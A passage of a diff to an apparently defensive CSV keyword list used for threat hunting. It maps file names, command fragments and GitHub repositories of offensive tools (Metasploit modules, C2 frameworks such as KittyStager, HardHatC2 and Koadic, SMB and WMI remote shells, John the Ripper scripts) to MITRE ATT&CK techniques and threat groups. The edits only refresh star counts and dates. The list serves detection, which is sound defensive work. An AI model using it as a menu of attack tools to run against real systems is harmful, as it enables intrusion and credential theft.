TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*Enelg52/KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Enelg52/KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Engineer_super.exe*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*engjibo/NetUser*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*enigma_fileless_uac_bypass*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*enigma0x3*","offensive_tool_keyword","Github Username","Github Author of malicious script and eploitaiton tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/enigma0x3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*enkomio/AlanFramework*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*enpass2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*enpass5tojohn.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" 
+"*enpass2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*enpass5tojohn.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*Enter-SMBSession -ComputerName *","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" "*Enter-SMBSession* -PipeName * -ServiceName *","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" "*Enter-WmiShell *","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*Enter-WmiShell.ps1*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation 
tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*--entrypoint Dinjector*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" -"*enum_artifacts_list.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_av_excluded.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_avproducts.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*enum_brocade.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*enum_artifacts_list.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_av_excluded.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_avproducts.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*enum_brocade.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*enum_domain_info.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*enum_firefox.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_hostfile.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_logged_on_users*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_logged_on_users.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_mikrotik.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_ms_product_keys.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*enum_firefox.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_hostfile.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_logged_on_users*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_logged_on_users.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_mikrotik.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_ms_product_keys.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*enum_printers.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*enum_shares.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*enum_shares.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_vmware.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_vyos.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*enum_shares.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_vmware.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_vyos.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
